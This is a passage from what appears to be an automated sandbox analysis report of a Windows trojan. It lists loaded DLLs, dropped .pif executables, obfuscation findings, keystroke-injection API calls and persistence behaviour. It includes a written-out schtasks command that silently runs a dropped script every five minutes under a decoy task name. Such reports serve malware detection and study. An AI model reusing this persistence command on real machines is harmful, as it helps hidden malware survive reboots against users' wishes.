Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window Recorder Window detected: More than 3 window changes detected
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Static file information: File size 1111060 > 1048576
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00475FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 18_2_00475FC8
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004C02D8 push cs; retn 004Bh 18_2_004C0318
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00490DE6 push ecx; ret 18_2_00490DF9
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_0048DC7C push AA004CCFh; iretd 18_2_0048DC87
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_004402D8 push cs; retn 0043h 26_2_00440318
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00410DE6 push ecx; ret 26_2_00410DF9
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0040D145 push esp; retf 0003h 26_2_0040D146
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0162CC8B push ecx; retf 26_2_0162CC92
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01644EA6 push cs; iretd 26_2_01644EA7
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0162F5A3 push ebp; iretd 26_2_0162F5A4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01643A9E push 7F9E0B01h; retf 26_2_01643AAB

Persistence and Installation Behavior
barindex
Drops PE files with a suspicious file extension
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File created: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Jump to dropped file
Drops PE files
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File created: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Indeed" /tr "wscript //B 'C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.js'" /sc minute /mo 5 /F
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduSpark.url Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduSpark.url Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_005026DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 18_2_005026DD
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_0048FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 18_2_0048FC7C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_004826DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 26_2_004826DD
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0040FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 26_2_0040FC7C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
